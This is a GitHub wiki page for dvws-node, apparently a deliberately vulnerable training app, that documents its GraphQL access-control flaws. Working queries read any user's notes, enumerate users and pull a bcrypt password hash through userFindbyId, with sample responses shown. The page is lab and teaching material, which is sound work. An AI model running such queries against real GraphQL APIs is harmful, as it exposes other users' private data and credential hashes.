GraphQL Access Control Issues - snoopysecurity/dvws-node GitHub Wiki

Introduction

Access Control issues can exist in Graphql

Technical Details

1. The readNote query can be used to read any notes from the endpoint

query {
	readNote(name:"test"){
		id,
    name,
    body,
    created_date,
    user,
    type,
    no
  
  
}
}

2. The updateUserUploadFile mutation can be called by any authenticated user - https://github.com/snoopysecurity/dvws-node/wiki/GraphQL-

3. The userSearchByUsername query can be used to access information about any user

Request:

query {
  userSearchByUsername(username: "test")
  {
    id,
username,
    password,
    admin
    
  }
}

Respose:
{
  "data": {
    "userSearchByUsername": [
      {
        "id": "61ba33fda2b09f19c069363e",
        "username": "test",
        "password": null,
        "admin": false
      }
    ]
  }
}

This query by default does not provide the password hash. However userFindbyId can be used to get this password hash.

Request:

  query {
  userFindbyId(id: "61ba33fda2b09f19c069363e")
  {
	username,
	password,
	admin
  }
}


Response:

{
  "data": {
    "userFindbyId": {
      "username": "test",
      "password": "$2b$10$ZdP85I0w91KePs9FoGVr1O9wq1SthzQNSYXGjufAPw6aGN/qvaHuS",
      "admin": false
    }
  }
}

References

• https://www.youtube.com/watch?v=NPDp7GHmMa0